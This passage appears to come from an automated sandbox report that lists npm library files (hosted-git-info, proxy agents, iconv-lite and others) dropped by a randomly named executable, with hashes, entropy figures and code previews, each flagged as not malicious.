              Preview:'use strict'..const { LRUCache } = require('lru-cache').const hosts = require('./hosts.js').const fromUrl = require('./from-url.js').const parseUrl = require('./parse-url.js')..const cache = new LRUCache({ max: 1000 })..class GitHost {. constructor (type, user, auth, project, committish, defaultRepresentation, opts = {}) {. Object.assign(this, GitHost.#gitHosts[type], {. type,. user,. auth,. project,. committish,. default: defaultRepresentation,. opts,. }). }.. static #gitHosts = { byShortcut: {}, byDomain: {} }. static #protocols = {. 'git+ssh:': { name: 'sshurl' },. 'ssh:': { name: 'sshurl' },. 'git+https:': { name: 'https', auth: true },. 'git:': { auth: true },. 'http:': { auth: true },. 'https:': { auth: true },. 'git+http:': { auth: true },. }.. static addHost (name, host) {. GitHost.#gitHosts[name] = host. GitHost.#gitHosts.byDomain[host.domain] = name. GitHost.#gitHosts.byShortcut[`${name}:`] = name.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2517
              Entropy (8bit):4.765550637816606
              Encrypted:false
              SSDEEP:
              MD5:53E94E5253759833E5655BDBFBE92B7E
              SHA1:7207CD1448A1A9DAF98DF5F8790CBD9A8B60BFF6
              SHA-256:9444D54E19CDAF56D4B257CA38A0850466BC3572677340FB132C48F2D3890B7C
              SHA-512:150160B7D0627F4AB18F6491E75EA3A9A44716D2FB503F97C45F9FDE45E68E18BCD7E5177B713ABFA4DA61BCFE97007E2B5EBD6F9A2D0ED9D9D4FA22F7011BE2
              Malicious:false
              Reputation:unknown
              Preview:const url = require('url')..const lastIndexOfBefore = (str, char, beforeChar) => {. const startPosition = str.indexOf(beforeChar). return str.lastIndexOf(char, startPosition > -1 ? startPosition : Infinity).}..const safeUrl = (u) => {. try {. return new url.URL(u). } catch {. // this fn should never throw. }.}..// accepts input like git:github.com:user/repo and inserts the // after the first :.const correctProtocol = (arg, protocols) => {. const firstColon = arg.indexOf(':'). const proto = arg.slice(0, firstColon + 1). if (Object.prototype.hasOwnProperty.call(protocols, proto)) {. return arg. }.. const firstAt = arg.indexOf('@'). if (firstAt > -1) {. if (firstAt > firstColon) {. return `git+ssh://${arg}`. } else {. return arg. }. }.. const doubleSlash = arg.indexOf('//'). if (doubleSlash === firstColon + 1) {. return arg. }.. return `${arg.slice(0, firstColon + 1)}//${arg.slice(firstColon + 1)}`.}..// attempt to correct an scp style url so
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1519
              Entropy (8bit):4.699031131123453
              Encrypted:false
              SSDEEP:
              MD5:200361284C50587A7E91ECEAF1D02ABB
              SHA1:CB47D34649F6BC291751B67CEEC4DD41725CFC66
              SHA-256:820F07FAAEDAEE8C7E8C72759684D37828320639F92A0404761B2A60BE326371
              SHA-512:75D50453E278293107C38457622F5D5C16BB6BAE4E9EF1EACA0CF7FA7E9B1582BC1897F9322EA54B3DF0AAA69CC97F0604D79827F6A0835FC6ACE997BF71AC07
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "hosted-git-info",. "version": "7.0.1",. "description": "Provides metadata and conversions from repository urls for GitHub, Bitbucket and GitLab",. "main": "./lib/index.js",. "repository": {. "type": "git",. "url": "https://github.com/npm/hosted-git-info.git". },. "keywords": [. "git",. "github",. "bitbucket",. "gitlab". ],. "author": "GitHub Inc.",. "license": "ISC",. "bugs": {. "url": "https://github.com/npm/hosted-git-info/issues". },. "homepage": "https://github.com/npm/hosted-git-info",. "scripts": {. "posttest": "npm run lint",. "snap": "tap",. "test": "tap",. "test:coverage": "tap --coverage-report=html",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "lintfix": "npm run lint -- --fix",. "template-oss-apply": "template-oss-apply --force". },. "dependencies": {. "lru-cache": "^10.0.1". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.18.0"
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text, with very long lines (755)
              Category:dropped
              Size (bytes):1274
              Entropy (8bit):5.117751804899454
              Encrypted:false
              SSDEEP:
              MD5:7B7CD412797B9E24E3C58EFF96661BF9
              SHA1:33382AAE7725488A616426986298F9D1CD2E566C
              SHA-256:AB868AD5A2EF5068560D9CD3B2180EC63C140BB4C5CAE1BA779D300A0AC74FA3
              SHA-512:4A08AFA6C702AB55BF7A37A0A0AB2C94CC21D87BA30F633C77700CF18B543E72D2BCBAC26ED9F2CA426089E92B5CA3BE0610CAB9690F0EC89960D32828DFDB06
              Malicious:false
              Reputation:unknown
              Preview:Copyright 2016-2018 Kornel Lesi.ski..Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DAT
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):23751
              Entropy (8bit):4.434099883703157
              Encrypted:false
              SSDEEP:
              MD5:79E153C9903D3B38F57A60C49995DD64
              SHA1:17CC151AD1CFD0BE75B32F171AD63F1ECF5E9EF2
              SHA-256:E5DA23845E88C1F06B8AE520AA99601AB57C0C1D9B0ECED70031F41938156D2D
              SHA-512:69C6B74ACD1DB1E1B3B2EFC4EB67FAF713A18B85DE7744BA25B8B77B12282C610FB1D7FBB13547CC1FB90EAFE8E4BF648CBFF083FCD1F55A530511A364CC4049
              Malicious:false
              Reputation:unknown
              Preview:'use strict';.// rfc7231 6.1.const statusCodeCacheableByDefault = new Set([. 200,. 203,. 204,. 206,. 300,. 301,. 308,. 404,. 405,. 410,. 414,. 501,.]);..// This implementation does not understand partial responses (206).const understoodStatuses = new Set([. 200,. 203,. 204,. 300,. 301,. 302,. 303,. 307,. 308,. 404,. 405,. 410,. 414,. 501,.]);..const errorStatusCodes = new Set([. 500,. 502,. 503, . 504,.]);..const hopByHopHeaders = {. date: true, // included, because we add Age update Date. connection: true,. 'keep-alive': true,. 'proxy-authenticate': true,. 'proxy-authorization': true,. te: true,. trailer: true,. 'transfer-encoding': true,. upgrade: true,.};..const excludedFromRevalidationUpdate = {. // Since the old body is reused, it doesn't make sense to change properties of the body. 'content-length': true,. 'content-encoding': true,. 'transfer-encoding':
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):526
              Entropy (8bit):4.660934988050377
              Encrypted:false
              SSDEEP:
              MD5:98040CE22071CFCD3B13E1DC2056F7B1
              SHA1:C04D9B4C66F89D66838317509AD63BD1C81DBF99
              SHA-256:B9A658180CFCBFCAB844048D9148A00D267F44F3DBB6D1C6661B31F3DF447DC2
              SHA-512:849243D9E3B650D4006BF79E806982E340B0A958321EF32323CBAA8246DB35B929AFF8085CE55F47E2D91B18BAA04CD30B68E85CD88990C9AE2D549931A73046
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "http-cache-semantics",. "version": "4.1.1",. "description": "Parses Cache-Control and other headers. Helps building correct HTTP caches and proxies",. "repository": "https://github.com/kornelski/http-cache-semantics.git",. "main": "index.js",. "scripts": {. "test": "mocha". },. "files": [. "index.js". ],. "author": "Kornel Lesi.ski <kornel@geekhood.net> (https://kornel.ski/)",. "license": "BSD-2-Clause",. "devDependencies": {. "mocha": "^10.0". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6608
              Entropy (8bit):4.497468096836468
              Encrypted:false
              SSDEEP:
              MD5:398AE046AEAB5D301B7D837FA0BF2B49
              SHA1:E53B9F78C1780AEB4D065340D41286241E307877
              SHA-256:24579044E210CF3567B15FD7DE067D281C9BD2285A4C95A8B398D979CC48B215
              SHA-512:981CE300D4A256BC30AF098172059B7168EE22BA8AC43B5C2411793BB7CAB64816874F282A661A716491BDE287CEBFCA528AD17562F846111D89427E798AD971
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) {. function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); }. return new (P || (P = Promise))(function (resolve, reject) {. function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } }. function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } }. function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); }. step((generator = generator.apply(thisArg, _arguments || [])).next());. });.};.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.const net_1 = __importDefault(require("net"));.const tls_1 = __importDefault(require("tls"));.const url
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):571
              Entropy (8bit):4.8915299206792096
              Encrypted:false
              SSDEEP:
              MD5:791789653009FED09C62AD17751F94CB
              SHA1:D1F98E1CB420168FEDC2C29BC18CF0B4D23484FC
              SHA-256:37C871632157431D22C0667A1688D54644E5D8172400CF21C747DD2F46CC4F47
              SHA-512:9CCC50841D2DCAACAE9AD199E552DAC15A071A81EB9BF14630E04C899E2884B64C69C6E18A56261CC60785075FE31B34466EDD4CAFDD7606337224C54E1FB400
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.const agent_1 = __importDefault(require("./agent"));.function createHttpProxyAgent(opts) {. return new agent_1.default(opts);.}.(function (createHttpProxyAgent) {. createHttpProxyAgent.HttpProxyAgent = agent_1.default;. createHttpProxyAgent.prototype = agent_1.default.prototype;.})(createHttpProxyAgent || (createHttpProxyAgent = {}));.module.exports = createHttpProxyAgent;.//# sourceMappingURL=index.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1425
              Entropy (8bit):4.755050811867143
              Encrypted:false
              SSDEEP:
              MD5:43DF38FF2A8D44850C87BE94A1940BE4
              SHA1:46C1370C1B73CA9E8097772507030FC65BF0A133
              SHA-256:7C6265385A57A724D42F1C365D3AF5B3E61CFEC4E5007C67A1719DE939C74072
              SHA-512:BBC7DF6FC02DF2557EF8DEC62EB0F01B3EADA75288B82DDE869D46E405CEFB1BCC39379CE6EFC894EAE28D0A1542D2171098EBB19E209567B96A5D6E54EF7BC3
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "http-proxy-agent",. "version": "5.0.0",. "description": "An HTTP(s) proxy `http.Agent` implementation for HTTP",. "main": "./dist/index.js",. "types": "./dist/index.d.ts",. "files": [. "dist". ],. "scripts": {. "prebuild": "rimraf dist",. "build": "tsc",. "test": "mocha",. "test-lint": "eslint src --ext .js,.ts",. "prepublishOnly": "npm run build". },. "repository": {. "type": "git",. "url": "git://github.com/TooTallNate/node-http-proxy-agent.git". },. "keywords": [. "http",. "proxy",. "endpoint",. "agent". ],. "author": "Nathan Rajlich <nathan@tootallnate.net> (http://n8.io/)",. "license": "MIT",. "bugs": {. "url": "https://github.com/TooTallNate/node-http-proxy-agent/issues". },. "dependencies": {. "@tootallnate/once": "2",. "agent-base": "6",. "debug": "4". },. "devDependencies": {. "@types/debug": "4",. "@types/node": "^12.19.2",. "@typescript-eslint/eslint-plugin": "1.6.0",. "@typescript-es
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):7841
              Entropy (8bit):4.562410384325192
              Encrypted:false
              SSDEEP:
              MD5:FC4517C70A83FE30A18118D32B70902E
              SHA1:3A9ECCDDD5BF06CC3D2B57C4D4F0CA0B5C2921A7
              SHA-256:CDF5601776256DEE031A1275186C409578DDBA5AA441E66C0BEA785F81E185E6
              SHA-512:4F462B8E237D33C97E7519573B5D4DEE98042A2420BAEF033A9432BE554B52E5CC024F9FCE2E8CF672548FDDD2935403055BB935FE617DA2AED522EBF8E571B3
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) {. function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); }. return new (P || (P = Promise))(function (resolve, reject) {. function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } }. function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } }. function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); }. step((generator = generator.apply(thisArg, _arguments || [])).next());. });.};.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.const net_1 = __importDefault(require("net"));.const tls_1 = __importDefault(require("tls"));.const url
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):579
              Entropy (8bit):4.896869641037991
              Encrypted:false
              SSDEEP:
              MD5:1AB2605115173249D307B538B0737FC4
              SHA1:07DF7553C92A7C9DD20130C9A0BAD9FA95F56F47
              SHA-256:7F18E187A92BF3691B1728523AD5863F08ACE4D25599535E1471F1F81E90F2CD
              SHA-512:3198A788E1F29DBE26909E6EB5CB39FB0BC5016BEB3D89701140E6A3F4A5A724AE87A03F83FBD5A6F89067F84E7A7A0DF8ED1F4DA923D5FAB3E0670D0E8512B8
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.const agent_1 = __importDefault(require("./agent"));.function createHttpsProxyAgent(opts) {. return new agent_1.default(opts);.}.(function (createHttpsProxyAgent) {. createHttpsProxyAgent.HttpsProxyAgent = agent_1.default;. createHttpsProxyAgent.prototype = agent_1.default.prototype;.})(createHttpsProxyAgent || (createHttpsProxyAgent = {}));.module.exports = createHttpsProxyAgent;.//# sourceMappingURL=index.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2460
              Entropy (8bit):4.365422003170873
              Encrypted:false
              SSDEEP:
              MD5:6D441256C55D02CFB830E0F06AAD8F15
              SHA1:DBD51CD25EE3413FF894FC58756DDC9CEAE47986
              SHA-256:24C1737B73DB4C109A4CB184CA768B4E85F6CC6CFCC74ED3836388A995B3E557
              SHA-512:E3CB33C1726408FC68C4ACDC8C02F48E044F0F76A66CAF4F1DD693C9F826E9FC753A4E14EA882C71AFE6E3CB8C5FFA5FEECD674C5487D3F3EC4CE5BAB86D0F0C
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.const debug_1 = __importDefault(require("debug"));.const debug = debug_1.default('https-proxy-agent:parse-proxy-response');.function parseProxyResponse(socket) {. return new Promise((resolve, reject) => {. // we need to buffer any HTTP traffic that happens with the proxy before we get. // the CONNECT response, so that if the response is anything other than an "200". // response code, then we can re-play the "data" events on the socket once the. // HTTP parser is hooked up.... let buffersLength = 0;. const buffers = [];. function read() {. const b = socket.read();. if (b). ondata(b);. else. socket.once('readable', read);. }. function cleanup() {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1405
              Entropy (8bit):4.754697357092176
              Encrypted:false
              SSDEEP:
              MD5:2832F2AD486161D4A74A82656F06F175
              SHA1:8C0A375492FC2B2FC37EFAE92D78DDD0B07DE53A
              SHA-256:D41D9127CBED43DF8E2D404BFAF41361942A8AFEB82EB57CCF8515E04EB33D1D
              SHA-512:5A121052CD8E2E8715131687670CFFABF10EE858028B6E5E4A686CE2A9E05BB3F85B336BA4DD638E3CD1E8113B730D37D5E3DF88D5A4C614AB5CF175CA4D3C47
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "https-proxy-agent",. "version": "5.0.1",. "description": "An HTTP(s) proxy `http.Agent` implementation for HTTPS",. "main": "dist/index",. "types": "dist/index",. "files": [. "dist". ],. "scripts": {. "prebuild": "rimraf dist",. "build": "tsc",. "test": "mocha --reporter spec",. "test-lint": "eslint src --ext .js,.ts",. "prepublishOnly": "npm run build". },. "repository": {. "type": "git",. "url": "git://github.com/TooTallNate/node-https-proxy-agent.git". },. "keywords": [. "https",. "proxy",. "endpoint",. "agent". ],. "author": "Nathan Rajlich <nathan@tootallnate.net> (http://n8.io/)",. "license": "MIT",. "bugs": {. "url": "https://github.com/TooTallNate/node-https-proxy-agent/issues". },. "dependencies": {. "agent-base": "6",. "debug": "4". },. "devDependencies": {. "@types/debug": "4",. "@types/node": "^12.12.11",. "@typescript-eslint/eslint-plugin": "1.6.0",. "@typescript-eslint/parser": "1.1.0
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):368
              Entropy (8bit):4.379470936545322
              Encrypted:false
              SSDEEP:
              MD5:578911BDC61015A0F6058FCF2530BF33
              SHA1:3C97478360899EEC2CD0A1EBFE2C086D909E2EC2
              SHA-256:73E3EBA013710960595A6A2E4C578B01499A619006987A76FB0E29AD40F31FE6
              SHA-512:C60C093A421AE33F8A188B2BC5CB71F9AB1BCA31E2A6E91D975D3641444D9A9812B8595AED2F121EACC6C3D9DB79538D2F483C313607B6F04F4E72E6A873F0D9
              Malicious:false
              Reputation:unknown
              Preview:.1.2.1 / 2017-05-19.==================.. * fix: package.json to reduce vulnerabilities (#3)..1.2.0 / 2016-05-21.==================.. * feat: warn with stack..1.1.0 / 2016-04-04.==================.. * deps: upgrade ms to 0.7.0..1.0.1 / 2014-12-31.==================.. * feat(index.js): warn when result is undefined..1.0.0 / 2014-08-14.==================.. * init.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1023
              Entropy (8bit):5.059832621894572
              Encrypted:false
              SSDEEP:
              MD5:838C366F69B72C5DF05C96DFF79B35F2
              SHA1:2807F3F1C4CB33B214DEFC4C7AB72F7E4E70A305
              SHA-256:89807ACF2309BD285F033404EE78581602F3CD9B819A16AC2F0E5F60FF4A473E
              SHA-512:E2F593CF01C162B5EA4A177DC69E8AAED9DA5D98FCD8912944E352D4656468E73DE28B039943EBD1996552DD1FA5BD4243B170AE22567E3B2523F47B2466BA9C
              Malicious:false
              Reputation:unknown
              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):442
              Entropy (8bit):4.867001554932783
              Encrypted:false
              SSDEEP:
              MD5:138306E46B441B03949C1B41B0289E4E
              SHA1:56752F7282D9411B53158A10785D0D610B1517A8
              SHA-256:6BD41EC8E67091CCA5753ED4EDECC8DA219C28E006857544F629A1861226006D
              SHA-512:9B56655F10152668284963BCFA2A5D217B94D50B96A5CB1BE675630AD941F220EA25BC9B18DBC09B8D1B8644AE2AD8D31D2F1DE2E4ACC15221F5E01D7138D3B2
              Malicious:false
              Reputation:unknown
              Preview:/*!. * humanize-ms - index.js. * Copyright(c) 2014 dead_horse <dead_horse@qq.com>. * MIT Licensed. */..'use strict';../**. * Module dependencies.. */..var util = require('util');.var ms = require('ms');..module.exports = function (t) {. if (typeof t === 'number') return t;. var r = ms(t);. if (r === undefined) {. var err = new Error(util.format('humanize-ms(%j) result undefined', t));. console.warn(err.stack);. }. return r;.};.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):686
              Entropy (8bit):4.525130490931884
              Encrypted:false
              SSDEEP:
              MD5:02A86FD27813079F4F0CF49346487A36
              SHA1:E6E3F6368E65173263DD3F9FA806DE8E74C54217
              SHA-256:B5CF746B84D4D4AFCDA0F9FD59C2120FED5E7F7BE1EC52293879A8C13F30ECED
              SHA-512:D1CC04F14BCAA36926AC14F418C0945BE96286EF8B1E0DB6E01F9B3AE486CBC0BD69AAD4185F25464B66F81FF9F64C9206FB250EFB651AEA45B5918A5FBBE3F4
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "humanize-ms",. "version": "1.2.1",. "description": "transform humanize time to ms",. "main": "index.js",. "files": [. "index.js". ],. "scripts": {. "test": "make test". },. "keywords": [. "humanize",. "ms". ],. "author": {. "name": "dead-horse",. "email": "dead_horse@qq.com",. "url": "http://deadhorse.me". },. "repository": {. "type": "git",. "url": "https://github.com/node-modules/humanize-ms". },. "license": "MIT",. "dependencies": {. "ms": "^2.0.0". },. "devDependencies": {. "autod": "*",. "beautify-benchmark": "~0.2.4",. "benchmark": "~1.0.0",. "istanbul": "*",. "mocha": "*",. "should": "*". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1064
              Entropy (8bit):5.109065218676079
              Encrypted:false
              SSDEEP:
              MD5:F942263D98F0D75E0E0101884E86261D
              SHA1:4F3CA49A793F6BB8465A3731FD965A128757B8CE
              SHA-256:AC779F7314C74F232EF847EA86E714ABE25CF6EEB5CC97B69451B74E2AF6492D
              SHA-512:B500B93AE948BE0023297CCD98873B4B8C8A73798326B865EB8D01812F8C22551BF44EADFEEC2ADE17D4AA94BBFBA4A9B456D9737BC7A56ED6D1F913C52613EC
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2011 Alexander Shtuchkin..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION.W
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):23065
              Entropy (8bit):4.66036884245835
              Encrypted:false
              SSDEEP:
              MD5:68A674BE42E7CE3248FFD90E076C4171
              SHA1:7604F3652777C0BAC059E1F526B3715CE8F938FA
              SHA-256:709D9D2E467540B9414AE53F72E43780F9A49FBF648D9A81983EACD34F501E25
              SHA-512:988E4EF65AFFBD9666C2AF41388C7B987D69459B30360AE2A9B752EB97D7566F2F744E06E480D486B8C13632198B2BD0A3ED1D1C29E51E479ABE18605F2F13F5
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var Buffer = require("safer-buffer").Buffer;..// Multibyte codec. In this scheme, a character is represented by 1 or more bytes..// Our codec supports UTF-16 surrogates, extensions for GB18030 and unicode sequences..// To save memory and loading time, we read table files only when requested...exports._dbcs = DBCSCodec;..var UNASSIGNED = -1,. GB18030_CODE = -2,. SEQ_START = -10,. NODE_START = -1000,. UNASSIGNED_NODE = new Array(0x100),. DEF_CHAR = -1;..for (var i = 0; i < 0x100; i++). UNASSIGNED_NODE[i] = UNASSIGNED;...// Class DBCSCodec reads and initializes mapping tables..function DBCSCodec(codecOptions, iconv) {. this.encodingName = codecOptions.encodingName;. if (!codecOptions). throw new Error("DBCS codec is called without the data."). if (!codecOptions.table). throw new Error("Encoding '" + this.encodingName + "' has no data.");.. // Load tables.. var mappingTable = codecOptions.table();... // Decode tables: MBCS ->
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):9389
              Entropy (8bit):5.144123459324624
              Encrypted:false
              SSDEEP:
              MD5:688736E83F355A67A59C252841D85E37
              SHA1:B4AB8F50253A46822D79749B4FBE632B07D99C63
              SHA-256:9D02B706A5F5411E2CF52B5191971B93F6B05B19D7529D829EBD17A1E060E158
              SHA-512:E3559CC1E638070ECF2C9914891740B1901A2191BD80C4304F989E92F8F9F32635E8CBB2F82A528350DDE44F00439BA744BA263B22CF5B6A6CA53A7E6ECB3D51
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..// Description of supported double byte encodings and aliases..// Tables are not require()-d until they are needed to speed up library load..// require()-s are direct to support Browserify...module.exports = {. . // == Japanese/ShiftJIS ====================================================. // All japanese encodings are based on JIS X set of standards:. // JIS X 0201 - Single-byte encoding of ASCII + . + Kana chars at 0xA1-0xDF.. // JIS X 0208 - Main set of 6879 characters, placed in 94x94 plane, to be encoded by 2 bytes. . // Has several variations in 1978, 1983, 1990 and 1997.. // JIS X 0212 - Supplementary plane of 6067 chars in 94x94 plane. 1990. Effectively dead.. // JIS X 0213 - Extension and modern replacement of 0208 and 0212. Total chars: 11233.. // 2 planes, first is superset of 0208, second - revised 0212.. // Introduced in 2000, revised 2004. Some characters are in Unicode Plane 2 (0x2xxxx).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):733
              Entropy (8bit):4.7593655475258885
              Encrypted:false
              SSDEEP:
              MD5:6322D5F9B2261E668213CA23C3CA063E
              SHA1:7475522D841D9933E63EE9AEF343E9F973D599CD
              SHA-256:EE406729FDEA34F4C77EEA5AFAD5025EA374BC41089FAFB6FA0F7336E1216713
              SHA-512:8C0967C54503631AE6092FEDB6BC4C8F93DEDBB2085593DC1EDF7BA53EB16DC3DC1B16375800BAD9922DB60C759886568C8DA0D89E5C702F795326D0895F94FF
              Malicious:false
              Reputation:unknown
              Preview:"use strict";..// Update this array if you add/rename/remove files in this directory..// We support Browserify by skipping automatic module discovery and requiring modules directly..var modules = [. require("./internal"),. require("./utf32"),. require("./utf16"),. require("./utf7"),. require("./sbcs-codec"),. require("./sbcs-data"),. require("./sbcs-data-generated"),. require("./dbcs-codec"),. require("./dbcs-data"),.];..// Put all encoding/alias/codec definitions to single object and export it..for (var i = 0; i < modules.length; i++) {. var module = modules[i];. for (var enc in module). if (Object.prototype.hasOwnProperty.call(module, enc)). exports[enc] = module[enc];.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):6309
              Entropy (8bit):4.706827114237772
              Encrypted:false
              SSDEEP:
              MD5:FB275BB945A15C99D4684B88BEE661E6
              SHA1:6CB61C7619296F5373FC4884B1F52B8CC85F45D4
              SHA-256:78B012B90E43A9D4648D0526F46E26BF07C572BBD3AE5EAEDACB244E343609C5
              SHA-512:07444F23DC06B679535A0D86BDF2FD015979A20B9E4A847D873648E2041B80F62409B602F8DA47C672F10BAA11369CADC96DAFFA91B1E5B8A5F6EB01F46AA92C
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var Buffer = require("safer-buffer").Buffer;..// Export Node.js internal encodings...module.exports = {. // Encodings. utf8: { type: "_internal", bomAware: true},. cesu8: { type: "_internal", bomAware: true},. unicode11utf8: "utf8",.. ucs2: { type: "_internal", bomAware: true},. utf16le: "ucs2",.. binary: { type: "_internal" },. base64: { type: "_internal" },. hex: { type: "_internal" },.. // Codec.. _internal: InternalCodec,.};..//------------------------------------------------------------------------------..function InternalCodec(codecOptions, iconv) {. this.enc = codecOptions.encodingName;. this.bomAware = codecOptions.bomAware;.. if (this.enc === "base64"). this.encoder = InternalEncoderBase64;. else if (this.enc === "cesu8") {. this.enc = "utf8"; // Use utf8 for decoding.. this.encoder = InternalEncoderCesu8;.. // Add decoder for versions of Node not supporting CESU-8. if (Buffer
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2191
              Entropy (8bit):4.872958302882698
              Encrypted:false
              SSDEEP:
              MD5:6F257833A4D930EAA9AF9225FAEF16B8
              SHA1:D0C2BDE053DCE8027EFF00B2E172CBED45579E6C
